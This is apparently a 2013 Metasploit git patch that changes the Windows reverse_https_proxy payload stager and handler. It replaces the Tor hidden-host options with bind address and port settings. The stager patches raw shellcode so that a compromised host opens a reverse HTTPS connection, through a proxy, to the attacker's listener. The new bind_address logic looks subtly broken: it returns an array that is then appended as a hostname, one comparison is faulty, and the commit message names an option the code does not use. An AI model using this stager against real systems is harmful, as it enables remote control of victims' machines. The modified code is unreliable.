From 063da8a22e3db80dcef42168abe868e9aea102d1 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 11 Nov 2013 22:21:05 +1000 Subject: [PATCH] Update reverse_https_proxy stager/handler This change updates the proxy handler code, which for some reason was ommitted in the orginal commits. This now uses the same mechanism as the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`. --- lib/msf/core/handler/reverse_https_proxy.rb | 8 +++- .../stagers/windows/reverse_https_proxy.rb | 40 ++++++++++++++----- 2 files changed, 36 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 10ec427f6b..1cc216f6d6 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb @@ -42,13 +42,17 @@ module ReverseHttpsProxy OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), - OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]), - OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) ], Msf::Handler::ReverseHttpsProxy) + register_advanced_options( + [ + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) + ], Msf::Handler::ReverseHttpsProxy) + end end diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index fe83475b03..3794ce3d9e 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -134,11 +134,7 @@ module Metasploit3 p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V") # patch the LPORT - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - lport = datastore['HIDDENPORT'] - else - lport = datastore['LPORT'] - end + lport = bind_port lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444 p[lportloc+1] = [lport.to_i].pack('V')[0] @@ -148,11 +144,7 @@ module Metasploit3 # append LHOST and return payload - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end + lhost = bind_address p + lhost.to_s + "\x00" end @@ -163,5 +155,33 @@ module Metasploit3 def wfs_delay 20 end + +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end